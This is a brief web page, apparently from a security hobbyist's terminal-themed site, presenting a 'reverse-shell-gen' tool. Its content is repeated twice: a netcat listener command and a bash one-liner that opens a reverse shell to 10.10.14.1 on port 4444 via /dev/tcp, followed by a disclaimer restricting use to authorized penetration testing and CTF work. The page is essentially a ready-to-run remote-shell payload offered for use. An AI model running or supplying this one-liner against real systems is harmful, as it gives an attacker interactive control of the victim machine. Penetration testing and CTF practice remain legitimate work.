reverse-shell-gen
root@sovietghost:~/tools/reverse-shell#
Generate reverse shell one-liners. Set up your listener with nc -lvnp 4444 first.
bash -i >& /dev/tcp/10.10.14.1/4444 0>&1
⚠ For authorized penetration testing and CTF use only.
root@sovietghost:~/tools/reverse-shell#
Generate reverse shell one-liners. Set up your listener with nc -lvnp 4444 first.
bash -i >& /dev/tcp/10.10.14.1/4444 0>&1
⚠ For authorized penetration testing and CTF use only.
> Thanks for visiting. Stay curious and stay secure. _